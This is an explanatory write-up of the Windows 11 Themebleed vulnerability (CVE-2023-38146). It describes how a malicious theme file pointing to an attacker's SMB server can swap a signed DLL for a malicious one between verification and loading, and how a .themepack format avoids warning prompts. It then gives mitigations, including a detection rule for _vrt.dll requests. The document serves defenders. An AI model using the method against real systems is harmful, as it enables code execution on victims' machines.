CVE-2023-38146, A.K.A. Themebleed was discovered by Gabe Kirkpatrick and is a time-of-check-to-time-of-use dll hijacking vulnerability with a slight twist. Windows 11 Versions 21H2 and 22H2 are vulnerable.

The vulnerability works because under a specific set of circumstances, opening a theme file will cause a dll that is improperly checked to be loaded and run in the context of the user who opened the theme file.

Background

Windows .theme files are simple text files that reference Windows .msstyles files. .msstyles files are just fancy .dll files that contain resources for the theme like icons. While .msstyles files are PE files and follow the .dll format, they should not contain executable code.

Vulnerability

If a .theme file references an .msstyles file with a PACKME_VERSION of 999, a special code branch of code is taken during the loading process and a it causes the process to attempt a call to a function contained in an accompanying .dll file. That second dll will have the same path and name as the .msstyles file, but will be appended with _vrt.dll. To be safe, that new dll is checked to ensure that it is a signed Microsoft .dll before it is loaded and the exported function is called.

The vulnerability lies in the improper verification of that .dll file. The verification and loading are two atomic actions: first the file is opened for reading and verified, then the file is opened for execution and loaded. If a malicious actor can separate the file open action for verification and file open action for execution, they can make it so that a legitimate .dll is used for verification and then a malicious .dll for execution.

One way that an attacker can control the files is by using a UNC path in the .theme file that points to an .msstyles file on an SMB server that the attacker controls. If the hosted .msstyles file has a PACKME_VERSION value of 999, then the theme loader will attempt to call a function contained in a .dll file on the same share. An SMB server must know the requested file actions to enforce permissions, so the action desired by the client is contained within the request to the SMB server. This allows the attacker to serve a legitimate, signed .dll when it receives a read request for the file, but a malicious .dll when it receives a request to open the same file for execution.

Further, the person who discovered the vulnerability also found that by converting the theme file into a cab file and naming it with the .themepack extension, the file will no longer appear as a downloaded file, and the user will not be prompted with a warning when they open it.

Mitigation

Microsoft patched this vulnerability by removing support for PACKME_VERSION 999. It is recommended that you patch, but because this is a very precise vulnerability with many parts, several options exist for mitigation in addition to patching. At a host filesystem level, mitigation for this exploit would be to alert and stop any open file request to files that end in _vrt.dll or at a network level, stop and alert on any SMB connections that request files ending in _vrt.dll. It is also likely safe for many environments to prevent any SMB requests outside the enterprise entirely, or even better, limit SMB connections to specific resources within the enterprise.